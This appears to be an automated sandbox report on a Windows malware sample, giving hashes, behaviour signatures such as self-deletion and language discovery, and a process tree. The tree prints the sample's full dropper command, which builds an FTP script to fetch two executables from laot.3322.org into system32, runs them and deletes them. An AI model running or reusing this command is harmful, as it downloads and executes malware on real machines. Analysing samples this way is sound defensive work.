Analysis

  • max time kernel
    119s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    06/09/2024, 18:27

General

  • Target

    d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe

  • Size

    44KB

  • MD5

    d0310b6b7e678c1100131d32fdffdf3b

  • SHA1

    901eabee57673826bdd5aa7f33973ab75831f33b

  • SHA256

    e14c582e968dcabd46a973be7a84a5ad6c0f7a2ae75b92f80093024b647a2eee

  • SHA512

    5932d020f1c7cdf18bea240cd92e4159a468591b34fd224fdd9ff77432f0a78f218737496f2d18aed2af3e5b1151f5da357a38939da1ba4377c5d13f2ad7f56d

  • SSDEEP

    768:nomSbguls/uNvGFJw6SYx27CbuwayDh5aeRghbo7te5MpGM9SD8qlG5jpYgXShI1:no9bfl8AvG/JoeBayDkRace

Score
7/10

Malware Config

Signatures

  • Deletes itself 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt to gather information about the system language of a victim host in order to infer its geographical location.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2160
    • C:\Windows\SysWOW64\Cmd.exe
      Cmd /c echo open laot.3322.org>>ftpdate.sys&echo ccc>>ftpdate.sys&echo 123>>ftpdate.sys&echo bin>>ftpdate.sys&echo get 360.exe %windir%\system32\Microsoft\360.exe>>ftpdate.sys&echo get XiaoMing.exe %windir%\system32\Microsoft\XiaoMing.exe>>ftpdate.sys&echo bye>>ftpdate.sys&ftp -s:ftpdate.sys&del ftpdate.sys&%windir%\system32\Microsoft\360.exe&%windir%\system32\Microsoft\XiaoMing.exe&Del %windir%\system32\Microsoft\360.exe&Del %windir%\system32\Microsoft\XiaoMing.exe
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2712
      • C:\Windows\SysWOW64\ftp.exe
        ftp -s:ftpdate.sys
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2012
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\Sc.bat""
      2⤵
      • Deletes itself
      • System Location Discovery: System Language Discovery
      PID:1768

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Sc.bat

    Filesize

    210B

    MD5

    163f3ae3f34cca06baa478340b49025c

    SHA1

    7f8f173ed106a95b660969dd5c58ec2beb6ee67e

    SHA256

    fc7dfbf59f55d47bd388dbafe8e9014ef81401d9e03f7a6f442490a84cc1658d

    SHA512

    9eaa09842f86e49ee69a2b8e2861c5d373b83b90ecc2468922097db2520568f74e9b657c600c47e28d8c82fa192932f7acaf59979d73fb55cf67ac757c08a5e7

  • C:\Users\Admin\AppData\Local\Temp\ftpdate.sys

    Filesize

    152B

    MD5

    0fb17816f7c290e13419d68fa258edfa

    SHA1

    59b9dd4af7fa17ce896b878b55b07ddc4a7936f9

    SHA256

    bc1cdde48c4f9a1c95233092cc2ab3c33bec604b4164fa5ed4e6eae994fdbb9c

    SHA512

    5cd2261a9d7d201336a52eb8538d088289ea1161662fc796e47a8da23455218a2a52be004808756645fc59fd19341bd299a82be305f3ce774163192f4a25cc99

  • memory/2160-2-0x0000000004960000-0x00000000059C2000-memory.dmp

    Filesize

    16.4MB

  • memory/2160-11-0x0000000000400000-0x000000000041D000-memory.dmp

    Filesize

    116KB

  • memory/2160-32-0x0000000000400000-0x000000000041D000-memory.dmp

    Filesize

    116KB